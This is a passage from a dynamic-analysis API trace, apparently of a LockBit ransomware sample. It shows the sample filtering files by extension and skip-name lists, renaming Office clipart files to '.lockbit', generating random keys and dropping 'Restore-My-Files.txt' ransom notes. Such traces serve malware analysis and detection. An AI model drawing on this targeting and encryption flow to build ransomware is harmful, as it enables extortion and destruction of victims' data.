lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0125.013] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0125.014] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0125.014] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0125.014] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0125.014] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0125.014] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0125.014] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0125.014] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0125.014] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099205.WMF") returned 1 [0125.014] lstrcmpiW (lpString1="ntldr", lpString2="J0099205.WMF") returned 1 [0125.014] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099205.WMF") returned 1 [0125.014] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099205.WMF") returned -1 [0125.014] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099205.WMF") returned -1 [0125.014] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099205.WMF") returned 1 [0125.014] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099205.WMF") returned -1 [0125.014] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0125.014] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF") returned=".WMF" [0125.014] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0125.014] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0125.014] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0125.014] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0125.014] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0125.014] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0125.014] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0125.014] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0125.014] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0125.015] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0125.015] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF.lockbit") returned 72 [0125.015] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099205.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0125.016] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0125.016] malloc (_Size=0x40068) returned 0x3df0008 [0125.016] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=17854) returned 1 [0125.016] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.017] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0125.017] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.017] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0125.018] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0125.024] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0125.024] malloc (_Size=0xa6) returned 0x77d7a8 [0125.024] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0125.027] free (_Block=0x77d7a8) [0125.027] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0125.027] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0125.027] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0125.027] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd20ae00, ftCreationTime.dwHighDateTime=0x1bd732d, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbd20ae00, ftLastWriteTime.dwHighDateTime=0x1bd732d, nFileSizeHigh=0x0, nFileSizeLow=0x133f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0101856.BMP", cAlternateFileName="")) returned 1 [0125.027] lstrcmpiW (lpString1=".", lpString2="J0101856.BMP") returned -1 [0125.027] lstrcmpiW (lpString1="..", lpString2="J0101856.BMP") returned -1 [0125.027] PathFindExtensionW (pszPath="J0101856.BMP") returned=".BMP" [0125.027] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0125.028] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0125.028] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0125.028] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0125.028] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0125.028] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0125.029] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0125.029] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0101856.BMP") returned 1 [0125.029] lstrcmpiW (lpString1="ntldr", lpString2="J0101856.BMP") returned 1 [0125.029] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0101856.BMP") returned 1 [0125.030] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0101856.BMP") returned -1 [0125.030] lstrcmpiW (lpString1="autorun.inf", lpString2="J0101856.BMP") returned -1 [0125.030] lstrcmpiW (lpString1="thumbs.db", lpString2="J0101856.BMP") returned 1 [0125.030] lstrcmpiW (lpString1="iconcache.db", lpString2="J0101856.BMP") returned -1 [0125.030] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0125.030] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP") returned=".BMP" [0125.030] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0125.030] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0125.030] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0125.031] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0125.031] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0125.031] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0125.031] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0125.031] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0125.031] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0125.031] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0125.031] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0125.031] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0125.031] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP.lockbit") returned 72 [0125.031] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101856.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0125.033] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0125.033] malloc (_Size=0x40068) returned 0x3df0008 [0125.033] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=78840) returned 1 [0125.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0125.034] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.034] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0125.034] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0125.041] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0125.041] malloc (_Size=0xa6) returned 0x77d7a8 [0125.041] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0125.056] free (_Block=0x77d7a8) [0125.056] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0125.056] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0125.056] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0125.056] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf830800, ftCreationTime.dwHighDateTime=0x1bd732d, ftLastAccessTime.dwLowDateTime=0x65df6970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbf830800, ftLastWriteTime.dwHighDateTime=0x1bd732d, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0101857.BMP", cAlternateFileName="")) returned 1 [0125.056] lstrcmpiW (lpString1=".", lpString2="J0101857.BMP") returned -1 [0125.056] lstrcmpiW (lpString1="..", lpString2="J0101857.BMP") returned -1 [0125.056] PathFindExtensionW (pszPath="J0101857.BMP") returned=".BMP" [0125.056] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0125.056] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0125.056] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0125.056] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0125.056] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0125.056] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0125.056] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0125.056] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0125.057] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0125.057] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0125.057] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0101857.BMP") returned 1 [0125.058] lstrcmpiW (lpString1="ntldr", lpString2="J0101857.BMP") returned 1 [0125.058] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0101857.BMP") returned 1 [0125.058] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0101857.BMP") returned -1 [0125.058] lstrcmpiW (lpString1="autorun.inf", lpString2="J0101857.BMP") returned -1 [0125.058] lstrcmpiW (lpString1="thumbs.db", lpString2="J0101857.BMP") returned 1 [0125.058] lstrcmpiW (lpString1="iconcache.db", lpString2="J0101857.BMP") returned -1 [0125.058] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0125.058] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP") returned=".BMP" [0125.058] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0125.058] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0125.058] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0125.059] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0125.059] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP.lockbit") returned 72 [0125.059] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101857.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0125.060] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0125.060] malloc (_Size=0x40068) returned 0x3df0008 [0125.060] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32184) returned 1 [0125.060] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.061] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0125.061] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.062] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0125.062] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0125.092] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0125.092] malloc (_Size=0xa6) returned 0x77d7a8 [0125.093] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0125.098] free (_Block=0x77d7a8) [0125.098] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0125.098] wsprintfW (in: 